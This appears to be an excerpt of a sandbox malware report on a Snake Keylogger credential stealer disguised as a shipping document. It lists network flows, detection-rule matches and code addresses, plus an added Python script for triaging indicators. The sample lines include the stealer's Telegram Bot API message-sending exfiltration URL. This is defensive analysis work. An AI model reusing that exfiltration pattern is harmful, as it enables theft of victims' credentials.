                    Source: unknown Network traffic detected: HTTP traffic on port 49717 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49737
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49735
                    Source: unknown Network traffic detected: HTTP traffic on port 49755 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49733
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49755
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49754
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49731
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49752
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49751
                    Source: unknown Network traffic detected: HTTP traffic on port 49726 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49749 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49729
                    Source: unknown Network traffic detected: HTTP traffic on port 49752 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49727
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49749
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49726
                    Source: unknown Network traffic detected: HTTP traffic on port 49754 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49718 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49735 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
                    Source: unknown Network traffic detected: HTTP traffic on port 49737 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 443
                    Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49745
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2
                    Source: unknown HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49755 version: TLS 1.2
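The string and network findings above are raw table cells. The following Python is added here as a worked example and is not part of the Joe Sandbox report: it parses those cells into indicators an analyst can pivot on, decoding each .sdmp memory-dump name (process id, base address, page protection), classifying each URL (Telegram Bot API exfiltration, reallyfreegeoip.org victim geolocation, or Chromium search-provider strings that only show browser profile files were read), and collapsing the bidirectional "A -> 443" / "443 -> A" port lines into one flow per client port joined with the HTTPS destination. The .sdmp field layout, the reading of the 0x20000 field as MEM_PRIVATE and the URL classes are assumptions; the sample lines are copied from this report.

```python
"""Structured triage of Joe Sandbox 'String found in binary or memory' and
'Network traffic detected' lines.  Added example, not Joe Sandbox code.

Assumed .sdmp layout (inferred from the names in this report):
<pid>.<stage>.<dump id>.<base>.<protect>.<f6>.<type>.<f8>.sdmp
with protect a Windows PAGE_* value and type 0x20000 = MEM_PRIVATE.
"""
import re
from collections import defaultdict

SDMP_RE = re.compile(
    r"([0-9A-F]{8})\.([0-9A-F]{8})\.(\d+)\.([0-9A-F]{16})"
    r"\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.([0-9A-F]{8})\.sdmp")
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}
# \s* tolerates the glued "sdmpString found" form of the raw report text.
STRING_LINE_RE = re.compile(
    r"^Source:\s*(.*?\.sdmp)\s*String found in binary or memory:\s*(\S+)")
NET_RE = re.compile(r"HTTP traffic on port (\d+) -> (\d+)")
TLS_RE = re.compile(
    r"HTTPS traffic detected: ([\d.]+):(\d+) -> ([\d.]+):(\d+) version: (TLS [\d.]+)")

# Exfiltration via the Telegram Bot API; the token is empty in the report
# because the captured string is the format template before substitution.
TELEGRAM_RE = re.compile(r"^https://api\.telegram\.org/bot[^/]*/send")
GEOIP_RE = re.compile(r"^https://reallyfreegeoip\.org/")
# Search-provider and favicon URLs Chromium keeps in its profile data (analyst
# heuristic): they appear because browser files were read, not as C2.
BROWSER_HOSTS = ("search.yahoo.com", "duckduckgo.com", "ecosia.org",
                 "google.com", "office.com")


def parse_sdmp(name):
    """Decode one dump file name into pid, base address and page protection."""
    m = SDMP_RE.search(name)
    if not m:
        return None
    pid, stage, _dump_id, base, protect, _f6, mem_type, _f8 = m.groups()
    prot = int(protect, 16)
    return {"pid": int(pid, 16), "stage": int(stage, 16), "base": int(base, 16),
            "protect": PAGE_PROTECT.get(prot, hex(prot)),
            "private": int(mem_type, 16) == 0x20000}


def classify_url(url):
    if TELEGRAM_RE.search(url):
        return "c2-exfil-telegram"
    if GEOIP_RE.search(url):
        return "victim-geolocation"
    host = re.match(r"https?://([^/]+)", url)
    if host and host.group(1).endswith(BROWSER_HOSTS):
        return "browser-artifact"
    return "other"


def parse_string_line(line):
    """One 'Source: ... .sdmp String found ...: <url>' line -> url, class, regions."""
    m = STRING_LINE_RE.match(line.strip())
    if not m:
        return None
    sources, url = m.groups()
    # The source cell alternates process names and dump names; keep the dumps.
    regions = [parse_sdmp(s) for s in sources.split(", ") if s.endswith(".sdmp")]
    return {"url": url, "class": classify_url(url),
            "regions": [r for r in regions if r]}


def summarize_network(lines):
    """One flow per client port, with server IP and TLS version where known."""
    flows = {}
    for line in lines:
        m = NET_RE.search(line)
        if m:
            a, b = int(m.group(1)), int(m.group(2))
            client = a if b == 443 else b      # the non-443 side is the ephemeral port
            flows.setdefault(client, {"server_ip": None, "tls": None})
            continue
        m = TLS_RE.search(line)
        if m:
            server_ip, _sport, _client_ip, client, ver = m.groups()
            f = flows.setdefault(int(client), {"server_ip": None, "tls": None})
            f["server_ip"], f["tls"] = server_ip, ver
    return flows


def triage(lines):
    """Group the URL strings by class so C2 and geolocation pivots stand out."""
    by_class = defaultdict(set)
    for line in lines:
        rec = parse_string_line(line)
        if rec:
            by_class[rec["class"]].add(rec["url"])
    return dict(by_class)


# Constructed sample: lines copied from this report, glued cells included.
SAMPLE = [
    "Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3719627669.0000000002FD5000"
    ".00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "
    "https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:704672",
    "Source: Shipment advice H-BL Draft.exe, 00000000.00000002.1319618401.000000000498B000"
    ".00000004.00000800.00020000.00000000.sdmp, PrcGlGVKeUCXxg.exe, 00000012.00000002"
    ".3712537195.0000000000431000.00000040.00000400.00020000.00000000.sdmpString found "
    "in binary or memory: https://reallyfreegeoip.org/xml/",
    "Source: PrcGlGVKeUCXxg.exe, 00000012.00000002.3724102996.00000000040B3000"
    ".00000004.00000800.00020000.00000000.sdmpString found in binary or memory: "
    "https://duckduckgo.com/ac/?q=",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443",
    "Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751",
    "Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.4:49751 version: TLS 1.2",
]
```

Two things the structured view makes visible that the flat list does not: the reallyfreegeoip.org/xml/ string is also present in a PAGE_EXECUTE_READWRITE private region at 0x431000 in PID 0x12 (18), which is where the unpacked second stage lives rather than the on-disk dropper, so that process is the one to dump for configuration recovery; and the captured Telegram template has an empty bot token and chat_id, so the live C2 identifiers have to come from the decrypted configuration, not from this string.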

                    System Summary

                    barindex
                    Source: 13.2.Shipment advice H-BL Draft.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.49cf660.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4c10530.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 0.2.Shipment advice H-BL Draft.exe.498b840.3.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects Encrial credential stealer malware Author: Florian Roth
                    Source: 14.2.PrcGlGVKeUCXxg.exe.4bcc710.2.raw.unpack, type: UNPACKEDPE Matched rule: Detects executables with potential process hooking Author: ditekSHen
                    Source: 00000000.00000002.1319618401.000000000498B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: 0000000E.00000002.1382016232.0000000004BCC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: Shipment advice H-BL Draft.exe PID: 7548, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
                    Source: Process Memory Space: PrcGlGVKeUCXxg.exe PID: 1340, type: MEMORYSTR Matched rule: Phoenix/404KeyLogger keylogger payload Author: ditekSHen
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_016E3E40
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_016E6F90
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_016EDA7C
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C6C778
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C6C340
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C6CFF3
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C6EC5F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C6EC70
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07C6CBC0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 0_2_07CC4898
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280D278
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_02805370
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280C148
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280C738
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280C468
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280CA08
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280E988
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_028069B0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280CFA9
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280CCD8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_02809DE0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_028029E0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280F961
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280F970
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0280E97A
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_02803E18
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06699668
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06692A90
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06691FA8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06691850
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06695148
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06699D38
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669D660
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669D670
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669D218
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669DAC8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669DAB9
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669E36A
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669E378
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669DF20
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06690B20
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06690B30
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669DF1F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669E7CF
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669E7D0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06691FA2
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669F071
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06691841
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06690040
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669EC28
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669003F
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669EC18
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06698CC0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669F4D8
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669F080
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669F922
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_06695138
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669F930
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669CDC0
                    Source: C:\Users\user\Desktop\Shipment advice H-BL Draft.exe Code function: 13_2_0669CDAF
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 14_2_01953E40
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 14_2_01956F90
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 14_2_0195DA7C
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 14_2_077839F8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148C146
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01485370
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148D278
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148C474
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148C738
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148E988
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_014869A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01483B95
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148CA08
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01489DE0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148CCD8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01486FC8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148CFAC
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01483E09
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148F961
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_0148E97C
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_014829EC
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_01483AA1
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C81D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C7B78
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C8FB0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CC560
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CA570
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CC54F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C0D48
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CE540
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CA55F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CE550
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C0D39
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C15E8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CE9E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CC9E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C15F8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CC9F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CA9F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CE9D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C11A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C1190
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C3460
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C6478
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C0040
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CBC40
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C9C50
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C3450
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CBC2F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CFC20
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C6022
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C9C3F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C6030
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CDC30
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C3008
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C0007
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CDC1F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C80E6
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CA0E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C08E0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C08F0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C80C8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CE0C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CC0C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CC0D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CA0D0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C38B8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CE0B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C6488
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C0489
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C0498
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C7B69
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C5770
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C2749
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C2758
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C5328
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C7720
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CB320
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C2300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CF300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CD300
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C531A
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CD310
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C7710
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CB310
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C2FF9
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C97C0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C5BD8
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CD7A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C2BA0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056CB7A0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C8FA1
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exe Code function: 18_2_056C2BB0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CB7B018_2_056CB7B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C97B018_2_056C97B0
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C578018_2_056C5780
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF78118_2_056CF781
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CF79018_2_056CF790
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CD79118_2_056CD791
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CCE6F18_2_056CCE6F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4A6818_2_056C4A68
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C6E6218_2_056C6E62
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CAE7F18_2_056CAE7F
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C4A7818_2_056C4A78
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C6E7018_2_056C6E70
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056CEE7018_2_056CEE70
                    Source: C:\Users\user\AppData\Roaming\PrcGlGVKeUCXxg.exeCode function: 18_2_056C1A4118_2_056C1A41
